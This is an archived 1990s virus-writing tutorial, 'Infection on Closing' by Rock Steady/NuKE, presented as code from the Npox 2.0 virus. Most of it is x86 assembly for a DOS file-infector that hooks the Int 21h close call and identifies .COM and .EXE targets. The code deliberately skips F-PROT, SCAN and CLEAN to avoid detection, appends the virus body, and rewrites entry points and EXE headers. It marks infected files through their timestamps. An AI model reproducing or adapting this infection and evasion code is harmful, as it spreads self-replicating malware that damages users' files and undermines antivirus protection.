💾 Archived View for spam.works › mirrors › textfiles › virus › rstut004.txt captured on 2023-11-14 at 12:53:20.

View Raw

More Information

⬅️ Previous capture (2023-06-16)

-=-=-=-=-=-=-

                        ****************************                          
                        **  Infection on Closing  **                          
                        **                        **                          
                        **  By Rock Steady/NuKE   **                          
                        ****************************                          

This routine goes out for a few people that had trouble hacking this          
routine themselves... I kinda like it, its my very OWN, no Dark Avenger       
hack, it is VERY straight forward, and kinda simple...I was not going         
to put this here, but since I `Promised' people and left them hanging         
with `Wait for IJ#5, I guess I owed you it... huh?'                           
                                                                              
Again this code comes right out of Npox 2.0, its need, simple fast,           
cool, and it works, Npox is your example, I heard MANY MANY complaints        
with other `Virus writing guides' Meaning they explained the code but         
sometimes the arthur himself never check if the code was good, as he          
may have modified it, and not test it... or whatever reason... Anyhow         
                                                                              
------------------                                                            
Okay once you intercepted the Int21h/ah=3Dh function you make it jump         
here...                                               
                                                                              
closing_file:   cmp     bx,0h                   ;Handle=0?                    
                je      closing_bye             ;if equal leave               
                cmp     bx,4h                   ;Handle > 4                   
                ja      close_cont              ;if YES ,then JUMP!           
closing_bye:    jmp     dword ptr cs:[int21]    ;Leave, no interest to us     
                                                                              
The whole point of the above code is that DOS contains 5 predefined           
Handlers, 0 -> 4, Basically, those handles are the NULL, CON, AUX             
COMx, LPTx handles... So we surely do not need to continue once we            
encounter that...                                                             
                                                                              
close_cont:     push    ax                                                    
                push    bx                                                    
                push    cx                                                    
                push    dx                                                    
                push    di                                                    
                push    ds                                                    
                push    es                                                    
                push    bp                                                    
                                                                              
Our biggest problem is how do we know if this file is a .COM or .EXE or       
simply just another dumb data file? We need this info before we can           
try to infect it... We do this by getting DOS's "Lists of List" this          
will give us all INFO need on the File Handle Number we have in BX!           
and we do that like so...                                                     
                                                                              
                push    bx                      ;Save File Handle             
                mov     ax,1220h                ;Get the Job File Table       
                int     2fh                     ;(JFT)                        
                                                                              
This will give us the JFT for the CURRENT File handle in BX, which            
is given thru ES:DI Then we use this information to get the Address of        
the System File Table!                                                        
                                                                              
                mov     ax,1216h        ;Get System File Table (List)         
                mov     bl,es:[di]      ;system file table entry number       
                int     2fh                                                   
                pop     bx              ;restore the Handle                   
                                                                              
                add     di,0011h                                              
                mov     byte ptr es:[di-0fh],02h                              
                                                                              
                add     di,0017h                ;Jump to the ASCIIZ string    
                cmp     word ptr es:[di],'OC'   ;Is it a .COM file?           
                jne     closing_next_try        ;Next cmp...                  
                cmp     byte ptr es:[di+2h],'M'                               
                jne     pre_exit                ;Nope exit                    
                jmp     closing_cunt3           ;.COM file continue           
                                                                              
closing_next_try:                                                             
                cmp     word ptr es:[di],'XE'   ;Is it a .EXE file?           
                jne     pre_exit                ;No, exit                     
                cmp     byte ptr es:[di+2h],'E'                               
                jne     pre_exit                ;No, exit                     
                                                                              
If it is an .EXE file, check if it is F-PROT or SCAN, see F-PROT when         
started up, Opens itself, closes itself, etc... So that a dumb                
virus will infect it, and then the CRC value changes and F-PROT               
screams... haha... Fuck-Prot! is the name...                                  
                                                                              
closing_cunt:   cmp     word ptr es:[di-8],'CS'                               
                jnz     closing_cunt1              ;SCAN                      
                cmp     word ptr es:[di-6],'NA'                               
                jz      pre_exit                                              
                                                                              
closing_cunt1:  cmp     word ptr es:[di-8],'-F'                               
                jnz     closing_cunt2              ;F-PROT                    
                cmp     word ptr es:[di-6],'RP'                               
                jz      pre_exit                                              
                                                                              
closing_cunt2:  cmp     word ptr es:[di-8],'LC'                               
                jnz     closing_cunt3                                         
                cmp     word ptr es:[di-6],'AE'    ;CLEAN                     
                jnz     closing_cunt3                                         
                                                                              
pre_exit:       jmp     closing_nogood                                        
                                                                              
The REST is pretty much the EXACT same on `how' you'd infect a normal         
file, I'll leave it for you to go thru it... The hardest part is              
OVER! Only trick part is, the ending... Remember to Close the file            
and then do an IRET, you don't leave control to dos, as you only needed       
to close it, so do it... OR DON'T close it and return to DOS, as dos          
will close it, just DON'T CLOSE IT TWICE!!!!                                  
                                                                              
closing_cunt3:  mov     ax,5700h                        ;Get file Time        
                call    calldos21                                             
                mov     al,cl                                                 
                or      cl,1fh                                                
                dec     cx                              ;60 Seconds           
                xor     al,cl                                                 
                jz      closing_nogood                  ;Already infected     
                                                                              
                push    cs                                                    
                pop     ds                                                    
                mov     word ptr ds:[old_time],cx       ;Save time            
                mov     word ptr ds:[old_date],dx                             
                                                                              
                mov     ax,4200h                        ;jmp beginning of     
                xor     cx,cx                           ;file...              
                xor     dx,dx                                                 
                call    calldos21                                             
                                                                              
                mov     ah,3fh                          ;Get first 1b byte    
                mov     cx,1Bh                                                
                mov     dx,offset buffer                                      
                call    calldos21                                             
                                                                              
                jc      closing_no_good                 ;error?               
                mov     ax,4202h                        ;Jmp to the EOF       
                xor     cx,cx                                                 
                xor     dx,dx                                                 
                call    calldos21                                             
                                                                              
                jc      closing_no_good                                       
                cmp     word ptr ds:[buffer],5A4Dh      ;.EXE file?           
                je      closing_exe                     ;Yupe then jmp        
                mov     cx,ax                                                 
                sub     cx,3h                                                 
                mov     word ptr ds:[jump_address+1],cx  ;Figure out the      
                call    infect_me                        ;jmp for .com        
                                                                              
                jc      closing_no_good                                       
                mov     ah,40h                          ;Write it to file     
                mov     dx,offset jump_address                                
                mov     cx,3h                                                 
                call    calldos21                                             
closing_no_good:                                                              
                mov     cx,word ptr ds:[old_time]       ;Save file time       
                mov     dx,word ptr ds:[old_date]       ;& date               
                mov     ax,5701h                                              
                call    calldos21                                             
                                                                              
closing_nogood: pop     bp                                                    
                pop     es                                                    
                pop     ds                                                    
                pop     di                                                    
                pop     dx                                                    
                pop     cx                                                    
                pop     bx                                                    
                pop     ax                                                    
                jmp     dword ptr cs:[int21]                                  
                                                                              
AS you see the above, we DIDN'T close the file, so we leave dos to do it.     
The bottom is for infecting .exes...                                          
                                                                              
closing_exe:    mov     cx,word ptr cs:[buffer+20]      ;Save the original    
                mov     word ptr cs:[exe_ip],cx         ;CS:IP & SS:SP        
                mov     cx,word ptr cs:[buffer+22]                            
                mov     word ptr cs:[exe_cs],cx                               
                mov     cx,word ptr cs:[buffer+16]                            
                mov     word ptr cs:[exe_sp],cx                               
                mov     cx,word ptr cs:[buffer+14]                            
                mov     word ptr cs:[exe_ss],cx                               
                                                                              
                push    ax                                                    
                push    dx                                                    
                call    multiply                                              
                sub     dx,word ptr cs:[buffer+8]                             
                mov     word ptr cs:[vir_cs],dx                               
                push    ax                                                    
                push    dx                                                    
                call    infect_me                                             
                pop     dx                                                    
                pop     ax                                                    
                mov     word ptr cs:[buffer+22],dx                            
                mov     word ptr cs:[buffer+20],ax                            
                pop     dx                                                    
                pop     ax                                                    
                jc      closing_no_good                                       
                                                                              
                add     ax,virus_size                                         
                adc     dx,0                                                  
                                                                              
                push    ax                                                    
                push    dx                                                    
                call    multiply                                              
                sub     dx,word ptr cs:[buffer+8]                             
                add     ax,40h                                                
                mov     word ptr cs:[buffer+14],dx                            
                mov     word ptr cs:[buffer+16],ax                            
                pop     dx                                                    
                pop     ax                                                    
                                                                              
                push    bx                                                    
                push    cx                                                    
                mov     cl,7                                                  
                shl     dx,cl                                                 
                                                                              
                mov     bx,ax                                                 
                mov     cl,9                                                  
                shr     bx,cl                                                 
                                                                              
                add     dx,bx                                                 
                and     ax,1FFh                                               
                jz      close_split                                           
                inc     dx                                                    
close_split:    pop     cx                                                    
                pop     bx                                                    
                                                                              
                mov     word ptr cs:[buffer+2],ax                             
                mov     word ptr cs:[buffer+4],dx                             
                                                                              
                mov     ah,40h                                                
                mov     dx,offset ds:[buffer]                                 
                mov     cx,20h                                                
                call    calldos21                                             
                                                                              
closing_over:   jmp     closing_no_good                                       
                                                                              
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-    
;                   Infection Routine...                                      
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-    
infect_me       proc                                                          
                mov     ah,40h                                                
                mov     dx,offset init_virus                                  
                mov     cx,virus_size                                         
                call    calldos21                                             
                                                                              
                jc      exit_error                      ;Error Split          
                mov     ax,4200h                                              
                xor     cx,cx                           ;Pointer back to      
                xor     dx,dx                           ;Top of file!         
                call    calldos21                                             
                                                                              
                jc      exit_error                      ;Split Dude...        
                clc                                     ;Clear carry flag     
                ret                                                           
exit_error:                                                                   
                stc                                     ;Set carry flag       
                ret                                                           
infect_me       endp